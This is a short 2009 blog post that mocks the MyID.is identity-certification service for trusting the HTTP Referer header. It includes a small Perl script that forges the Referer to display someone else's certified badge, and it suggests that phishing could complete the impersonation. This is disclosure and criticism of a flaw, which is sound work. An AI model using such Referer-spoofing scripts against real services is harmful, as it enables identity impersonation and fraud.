MyID.is FAIL
2009/03/27 filed under /webToday I came across MyID.is, a new webservice that claims to be a Digital Identity Certification Platform.
That sounds fun! Certification I find interesting and a fancy website using X.509 or something cooler? Wow. But nope. Not that cool and probably not worth spending time on.
I found it hard to find exactly it was what they offered. I mean, what does this really tell you?
MyID.is is a Digital Identity certification platform. People use MyID.is to certify their digital identity, certify any content that they publish over the Internet, such as blog, website, comments, photos, videos, social network profiles, and in general to manage their digital life.
Are we going to put signatures on everything, using a PGP like system? (By the way, this is all there is in their FAQ)
The blog has a little more information. Basically, they want to know your full name and credit card number (alarm bells should go off here) in order for you to post your own "certified badge" on your website.
Since they trust the HTTP_REFERER header for this, it's in secure as heck.
Oh well, from now on, I am Charles.Nouyrit, really, look at this badge!
Sure, it doesn't link to their website, but it does show the correct timestamp and all. With a little trickery/phishing, I'm sure you can even forge the page it should link to.
The trick here is to provide your own HTTP_REFERER header, like this perl script does:
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new();
$ua->default_header( 'Referer' => 'http://blog.myid.is/');
my $resp = $ua->get('http://devbadge.myid.is/?k=d9b6ddf2-b6be-4cfe'.
'-a562-aef151f903c8&w=200&c=http://blog.myid.is/');
print "Content-type: image/png\n\n", $resp->content;This system is far from perfect and completely useless, IMHO. Afterall, you still need to trust MyID.is, something I don't do at this stage.
